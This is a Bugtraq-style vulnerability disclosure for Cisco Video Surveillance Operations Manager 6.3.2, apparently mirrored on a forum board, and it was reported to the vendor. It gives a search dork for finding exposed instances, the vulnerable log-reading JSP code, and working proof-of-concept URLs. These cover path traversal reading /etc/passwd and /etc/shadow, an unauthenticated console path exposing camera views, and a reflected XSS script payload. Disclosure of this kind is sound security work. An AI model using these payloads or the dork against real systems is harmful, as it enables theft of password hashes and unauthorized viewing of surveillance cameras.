Cisco Video Surveillance Operations Manager Multiple vulnerabili

看板Bugtraq作者時間13年前 (2013/04/27 12:32), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
# Exploit Title:Cisco Video Surveillance Operations Manager Multiple=20 vulnerabilities # Google Dork: intitle:"Video Surveillance Operations Manager > Login" # Date: 22 Feb 2013 reported to the vendor # Exploit Author: Bassem | bassem.co # Vendor Homepage: www.cisco.com # Version: Version 6.3.2 # Tested on: Version 6.3.2 #1- The application is vulnerable to Local file inclusion read_log.jsp and read_log.dep not validate the name and location of the=20 log file , un authenticated remote attacker can perform this --------------------------------------------- read_log.jsp: /usr/BWhttpd/root/htdocs/BWT/utils/logs from /usr/BWhttpd/logs/<%=3D logName %> --------------------------------------------- --------------------------------------------- read_log.dep <%! protected LinkedList getBwhttpdLog( String logName, String=20 theOrder ) { String logPath =3D "/usr/BWhttpd/logs/"; String theLog =3D logPath + logName; LinkedList resultList =3D new LinkedList(); try { BufferedReader in =3D new=20 BufferedReader(new FileReader(theLog)); String theLine =3D ""; while( (theLine =3D=20 in.readLine()) !=3D null ) { if(=20 theOrder.indexOf("descending") > -1 ) { =20 resultList.addFirst(theLine); } else { =20 resultList.addLast(theLine); } } ----------------------------------------------- POC: http://serverip/BWT/utils/logs/read_log.jsp?filter=3D&log=3D../../../../../= .../../../../etc/passwd http://serverip/BWT/utils/logs/read_log.jsp?filter=3D&log=3D../../../../../= .../../../../etc/shadow ##################################################################### #2- The application is vulnerable to local file inclusion select and display log not validate the log file names , If attacker=20 pass /etc/passwd through the http post request system will display it=20 as log file POC: http://serverip/monitor/logselect.php ##################################################################### #3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't=20 perform the proper authentication for the management and view console,=20 Remote attacker can gain access to the system and view the attached=20 cameras without authentication POC: http://serverip/broadware.jsp ##################################################################### #4 Application is vulnerable to XSS The web application doesn't perform validation for the inputs/outputs=20 for many of its pages so its vulnerable to XSS attacks POC:=20 " rel="nofollow">http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>
更多 b. 的文章
文章代碼(AID): #1HUrJIKA (Bugtraq)